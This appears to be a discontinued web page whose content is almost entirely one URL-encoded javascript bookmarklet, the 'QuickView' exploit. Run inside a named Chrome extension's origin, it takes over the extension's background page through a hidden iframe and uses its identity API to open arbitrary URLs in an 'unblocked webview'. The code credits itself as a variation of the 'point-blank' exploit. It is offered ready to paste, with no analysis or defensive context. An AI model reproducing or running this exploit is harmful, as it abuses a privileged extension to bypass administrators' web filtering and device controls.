This version of The Wagon Site has been discontinued, as a new HTML version is being worked on.
javascript:!function()%7Bif("chrome-extension%3A%2F%2Fbpmcpldpdmajfigpchkicefoigmkfalc"!%3D%3Dwindow.origin)return void alert("You ran this script on the wrong page.")%3Bif(window.quickview)return void alert("QuickView is already active in this tab.")%3Bwindow.quickview%3D!0%3Blet t%3Dt%3D>document.getElementById(t)%2Cn%3D%7BGoogle%3A"https%3A%2F%2Fgoogle.com"%2CYoutube%3A"https%3A%2F%2Fyoutube.com"%2CDiscord%3A"https%3A%2F%2Fdiscord.com"%2CReddit%3A"https%3A%2F%2Freddit.com"%2C"Titanium Network"%3A"https%3A%2F%2Ftitaniumnetwork.org"%7D%2Ce%3Dnull%3Bfunction i()%7Blet n%3Dt("url_input").value%3Bn.startsWith("https%3A%2F%2F")%7C%7Cn.startsWith("http%3A%2F%2F")%7C%7Calert("Warning%3A Your URL does not begin with http%3A%2F%2F or https%3A%2F%2F.")%2Co(n)%7Dfunction o(t)%7Blet n%3D%60data%3Atext%2Fhtml%2C%5Cn <html>%5Cn <head>%5Cn <script>%5Cn setTimeout(() %3D> %7B%5Cn window.location.href %3D "%24%7BencodeURIComponent(t)%7D"%3B%5Cn %7D%2C 500)%3B%5Cn <%5C%2Fscript>%5Cn <%2Fhead>%5Cn <body>%5Cn <p>Redirecting to %24%7Bt%7D<%2Fp>%5Cn <%2Fbody>%5Cn <%2Fhtml>%60%3Be.chrome.identity.launchWebAuthFlow(%7Burl%3An%2Cinteractive%3A!0%7D%2C(()%3D>%7B%7D))%7D!function(t)%7Blet n%3Ddocument.createElement("iframe")%3Bn.style.display%3D"none"%2Cn.src%3Dwindow.origin%2B"%2Fscripts%2Fcommon%2Felements%2Fhyperlink%2Fhyperlink.html"%2Cn.onload%3D()%3D>%7Bt(n.contentWindow.chrome.extension.getBackgroundPage())%2Cn.remove()%7D%2Cdocument.body.append(n)%7D((function(a)%7Be%3Da%2Cdocument.write('%5Cn <!DOCTYPE html>%5Cn <html>%5Cn <head>%5Cn <meta charset%3D"utf-8">%5Cn <meta name%3D"viewport" content%3D"width%3Ddevice-width">%5Cn <link rel%3D"stylesheet" href%3D"https%3A%2F%2Ffonts.xz.style%2Fserve%2Finter.css">%5Cn <link rel%3D"icon" href%3D"https%3A%2F%2Fquickview-exploit.pages.dev%2Fimg%2Ficon_32.png">%5Cn <title>QuickView GUI<%2Ftitle>%5Cn <style>%5Cn %5Cn * %7B%5Cn font-family%3A "Inter"%2C sans-serif%3B%5Cn color%3A %23e2e8f0%5Cn %7D%5Cn%5Cn body %7B%5Cn background-color%3A %230f172a%3B%5Cn %7D%5Cn%5Cn .button %7B%5Cn background-color%3A %231a73e8%3B%5Cn text-decoration%3A none%3B%5Cn user-select%3A none%3B%5Cn font-size%3A 14px%3B%5Cn padding%3A 10px%3B%5Cn %7D%5Cn%5Cn %23title_div %7B%5Cn display%3A flex%3B%5Cn align-items%3A center%3B%5Cn gap%3A 16px%3B%5Cn %7D %5Cn%5Cn %23input_div %7B%5Cn display%3A flex%3B%5Cn gap%3A 6px%5Cn %7D%5Cn%5Cn %23url_input %7B%5Cn padding%3A 9px%3B%5Cn background-color%3A %231e293b%3B%5Cn border%3A 2px solid %23334155%3B%5Cn width%3A 100%25%3B%5Cn %7D%5Cn%5Cn %23webview_button %7B%5Cn width%3A 150px%3B%5Cn text-align%3A center%3B%5Cn %7D%5Cn%5Cn %23content %7B%5Cn max-width%3A 600px%3B%5Cn margin-left%3A auto%3B%5Cn margin-right%3A auto%3B%5Cn %7D%5Cn <%2Fstyle>%5Cn <%2Fhead> %5Cn <body>%5Cn <div id%3D"content">%5Cn <div id%3D"title_div">%5Cn <img id%3D"icon_img" src%3D"https%3A%2F%2Fquickview-exploit.pages.dev%2Fimg%2Ficon.png" height%3D"64px">%5Cn <h1>QuickView<%2Fh1>%5Cn <%2Fdiv>%5Cn <div id%3D"input_div">%5Cn <input id%3D"url_input" placeholder%3D"Enter a URL here.">%5Cn <a id%3D"webview_button" class%3D"button" href%3D"%23">Open Webview<%2Fa>%5Cn <%2Fdiv>%5Cn <p>Enter any URL into the box above and it will open in an unblocked webview. Note that if the page load fails%2C the webview will close without displaying anything.<%2Fp>%5Cn <h2>Preset URLs%3A<%2Fh2>%5Cn <ul id%3D"urls_list"><%2Ful>%5Cn%5Cn <h2>Credits%3A<%2Fh2>%5Cn <p>QuickView was created by vk6%237391 and Bypassi%237037%2C and it is licensed under the <a href%3D"https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fgpl-3.0.txt" target%3D"_blank">GNU GPL v3<%2Fa>. The source code is available at%3A <a href%3D"https%3A%2F%2Fgithub.com%2Fading2210%2Fquickview" target%3D"_blank">https%3A%2F%2Fgithub.com%2Fading2210%2Fquickview<%2Fa><%2Fp>%5Cn <p>This exploit is part of the <a href%3D"https%3A%2F%2Fgithub.com%2Fswarm-team" target%3D"_blank">%7Bswarm%7D project<%2Fa> and utilizes a variation of the <a href%3D"https%3A%2F%2Fblog.bypassi.com%2F_%2Fpoint-blank" target%3D"_blank">point-blank<%2Fa> exploit.<%2Fp>%5Cn <%2Fdiv>%5Cn <%2Fbody>%5Cn <%2Fhtml>')%2Cfunction()%7Blet e%3Dt("urls_list")%2Ci%3Dt("url_input")%3Bfor(let%5Bt%2Co%5Dof Object.entries(n))%7Blet n%3Ddocument.createElement("li")%2Ca%3Ddocument.createElement("a")%3Ba.innerHTML%3Dt%2Ca.onclick%3Dfunction()%7Bi.value%3Do%7D%2Ca.href%3D"%23"%2Cn.append(a)%2Ce.append(n)%7D%7D()%2Ce.tab_listener%26%26e.chrome.tabs.onUpdated.removeListener(e.tab_listener)%2Ce.tab_listener%3D(t%2Cn%2Ci)%3D>%7Bif("loading"!%3D%3Dn.status)return%3Bif("https%3A%2F%2Fwww.google.com%2F%23%2520"!%3Di.url)return%3Be.chrome.tabs.remove(t)%2Ce.popup%3De.open()%3Blet a%3De.popup.prompt("What URL would you like to open a webview for%3F"%2C"https%3A%2F%2Fwww.google.com")%3Ba%26%26o(a)%7D%2Ce.chrome.tabs.onUpdated.addListener(e.tab_listener)%2Ct("webview_button").onclick%3Di%7D))%7D()%3B